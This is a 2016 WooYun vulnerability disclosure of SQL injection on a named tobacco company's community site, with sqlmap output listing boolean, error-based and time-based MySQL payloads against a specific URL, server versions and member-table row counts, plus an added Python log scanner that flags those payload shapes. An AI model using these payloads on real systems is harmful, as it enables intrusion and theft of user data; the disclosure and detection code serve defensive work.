
Vulnerability Summary

Defect ID: wooyun-2016-0169165

Title: SQL injection in a site of Hongyun Honghe Tobacco (Group) Co., Ltd. (红云红河烟草(集团)有限责任公司)

Affected vendor: Hongyun Honghe Tobacco (Group) Co., Ltd. (红云红河烟草(集团)有限责任公司)

Reporter: 蝶.!

Submitted: 2016-01-17 22:14

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Vulnerability status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2016-01-17: Details sent to the vendor; awaiting vendor handling
2016-01-20: Vendor confirmed; details visible to the vendor only
2016-01-30: Details disclosed to core white hats and domain experts
2016-02-09: Details disclosed to regular white hats
2016-02-19: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Brief description:

SQL injection in a site of Hongyun Honghe Tobacco (Group) Co., Ltd. (红云红河烟草(集团)有限责任公司)

Detailed description:

Injection point: http://club.zerone.me/space.php?uid=14208&do=blog&id=69562

sqlmap identified the following injection point(s) with a total of 4089 HTTP(s) requests:
---
Parameter: uid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=14208 RLIKE (SELECT (CASE WHEN (6623=6623) THEN 14208 ELSE 0x28 END))&do=blog&id=69562
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=14208 AND (SELECT 1884 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(1884=1884,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&do=blog&id=69562
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=14208 AND (SELECT * FROM (SELECT(SLEEP(5)))jGrv)&do=blog&id=69562
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] uc_hhtest
[*] uchome_hhtest
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uc_hhtest
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 181769 |
| uc_memberfields | 133594 |
| uc_friends | 98153 |
| uc_members_copy | 33783 |
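As an added example (not part of the original report), the following Python scans web-server access-log lines for the uid parameter and flags any request whose value is not a plain integer, classifying it by the three payload shapes sqlmap reported above: boolean-based (RLIKE / CASE WHEN), error-based (FLOOR(RAND(0)*2) ... GROUP BY) and time-based (SLEEP). The log lines, IPs and timestamps are constructed, not taken from the site.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-style access-log lines carrying the three uid payload shapes from
# the sqlmap output above (URL-encoded as a server would log them), plus a benign and a malformed hit.
SAMPLE_LOG = r"""
10.0.0.5 - - [17/Jan/2016:22:10:01 +0800] "GET /space.php?uid=14208&do=blog&id=69562 HTTP/1.1" 200 5120
10.0.0.5 - - [17/Jan/2016:22:10:03 +0800] "GET /space.php?uid=14208%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286623%3D6623%29%20THEN%2014208%20ELSE%200x28%20END%29%29&do=blog&id=69562 HTTP/1.1" 200 5120
10.0.0.5 - - [17/Jan/2016:22:10:04 +0800] "GET /space.php?uid=14208%20AND%20%28SELECT%201884%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176787a71%2C%28SELECT%20%28ELT%281884%3D1884%2C1%29%29%29%2C0x716b786271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&do=blog&id=69562 HTTP/1.1" 500 312
10.0.0.5 - - [17/Jan/2016:22:10:10 +0800] "GET /space.php?uid=14208%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29jGrv%29&do=blog&id=69562 HTTP/1.1" 200 5120
10.0.0.9 - - [17/Jan/2016:22:11:00 +0800] "GET /space.php?uid=abc&do=blog HTTP/1.1" 200 1024
"""

# Minimal access-log parser: client IP, timestamp, method, request target and response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Ordered (label, pattern) pairs; the error-based shape is tested first because it also
# contains the "n=n" comparison that the boolean-based check would otherwise claim.
TECHNIQUES = [
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|GROUP\s+BY\s+\w+\s*\)", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(|\bBENCHMARK\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bRLIKE\b|\bCASE\s+WHEN\b|\bAND\s+\d+\s*=\s*\d+", re.I)),
]


def classify_uid(value):
    """Return None for a well-formed integer uid, otherwise the technique label or 'malformed'."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "malformed"


def scan_log(text):
    """Yield (ip, status, verdict) for every request whose decoded uid is not a plain integer."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for raw in params.get("uid", []):  # parse_qs already URL-decodes the value
            verdict = classify_uid(raw)
            if verdict:
                findings.append((m.group("ip"), m.group("status"), verdict))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same integer check applied server-side (casting uid with intval or binding it as an integer parameter in a prepared statement) is the fix that closes the injection point itself.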

Proof of vulnerability:

web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uchome_hhtest

Fix recommendation:

Copyright notice: please credit the source when reposting: 蝶.!@乌云


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability rank: 8

Confirmed: 2016-01-20 15:08

Vendor reply:

CNVD confirmed that it could not reproduce the described situation; the case has been forwarded via CNCERT to the Yunnan branch center, which will coordinate handling with the unit that administers the website.

Latest status:

None yet